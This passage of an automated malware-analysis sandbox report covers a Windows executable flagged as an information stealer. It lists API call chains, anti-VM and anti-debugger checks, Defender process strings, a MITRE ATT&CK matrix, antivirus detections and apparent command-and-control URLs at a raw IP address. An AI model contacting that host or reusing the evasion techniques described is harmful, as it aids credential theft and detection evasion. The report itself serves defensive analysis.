                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00419860
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_6-26397
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeEvaded block: after key decisiongraph_6-27558
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeAPI coverage: 6.4 %
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,6_2_0040E430
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,6_2_004138B0
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,6_2_00414570
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_00414910
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,6_2_0040ED20
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,6_2_0040BE70
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_0040DE10
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_004016D0
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,6_2_0040DA80
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,6_2_00413EA0
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_0040F6B0
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03033B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,6_2_03033B17
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03034B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_03034B77
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,6_2_0302EF87
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_030347D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,6_2_030347D7
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,6_2_0302E697
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03034107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,6_2_03034107
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_0302F917
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03021937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_03021937
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,6_2_0302E077
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,6_2_0302C0D7
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,6_2_0302DCE7
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00401160 GetSystemInfo,ExitProcess,6_2_00401160
                    Source: Amcache.hve.12.drBinary or memory string: VMware
                    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                    Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: oqIz1tfl5h.exe, 00000006.00000002.1600926236.0000000002DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                    Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeAPI call chain: ExitProcess graph end nodegraph_6-26382
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeAPI call chain: ExitProcess graph end nodegraph_6-26385
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeAPI call chain: ExitProcess graph end nodegraph_6-27758
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeAPI call chain: ExitProcess graph end nodegraph_6-26404
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeAPI call chain: ExitProcess graph end nodegraph_6-26205
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeAPI call chain: ExitProcess graph end nodegraph_6-26270
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeAPI call chain: ExitProcess graph end nodegraph_6-26396
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeAPI call chain: ExitProcess graph end nodegraph_6-26425
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0041AD48
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_004045C0 VirtualProtect ?,00000004,00000100,000000006_2_004045C0
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00419860
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00419750 mov eax, dword ptr fs:[00000030h]6_2_00419750
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_02DFAB13 push dword ptr fs:[00000030h]6_2_02DFAB13
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0302092B mov eax, dword ptr fs:[00000030h]6_2_0302092B
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03020D90 mov eax, dword ptr fs:[00000030h]6_2_03020D90
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_030399B7 mov eax, dword ptr fs:[00000030h]6_2_030399B7
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,6_2_00417850
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0041AD48
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0041CEEA SetUnhandledExceptionFilter,6_2_0041CEEA
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0041B33A
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0303AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0303AFAF
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0303D151 SetUnhandledExceptionFilter,6_2_0303D151
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_0303B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0303B5A1
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: oqIz1tfl5h.exe PID: 4828, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,6_2_00419600
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_03039867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,6_2_03039867
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,6_2_00417B90
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,6_2_03037DF7
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,6_2_00416920
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,6_2_00417850
                    Source: C:\Users\user\Desktop\oqIz1tfl5h.exeCode function: 6_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,6_2_00417A30
                    Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 6.3.oqIz1tfl5h.exe.3070000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.oqIz1tfl5h.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.oqIz1tfl5h.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.oqIz1tfl5h.exe.3020e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.3.oqIz1tfl5h.exe.3070000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.oqIz1tfl5h.exe.3020e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.1336754852.0000000003070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: oqIz1tfl5h.exe PID: 4828, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 6.3.oqIz1tfl5h.exe.3070000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.oqIz1tfl5h.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.oqIz1tfl5h.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.oqIz1tfl5h.exe.3020e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.3.oqIz1tfl5h.exe.3070000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.oqIz1tfl5h.exe.3020e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.1336754852.0000000003070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: oqIz1tfl5h.exe PID: 4828, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Native API
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping2
                    System Time Discovery
                    Remote ServicesData from Local System1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Virtualization/Sandbox Evasion
                    LSASS Memory31
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS11
                    Process Discovery
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Software Packing
                    DCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc Filesystem123
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    oqIz1tfl5h.exe34%ReversingLabs
                    oqIz1tfl5h.exe100%AviraHEUR/AGEN.1312567
                    oqIz1tfl5h.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://62.204.41.177/true
                      unknown
                      http://62.204.41.177/edd20096ecef326d.phptrue
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://62.204.41.177/edd20096ecef326d.php~oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://upx.sf.netAmcache.hve.12.drfalse
                          • URL Reputation: safe
                          unknown
                          http://62.204.41.177/5PIX:oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://62.204.41.177/edd20096ecef326d.php8oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
